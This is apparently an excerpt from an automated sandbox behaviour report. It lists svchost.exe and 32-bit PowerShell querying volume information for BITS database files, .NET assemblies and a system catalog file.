Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation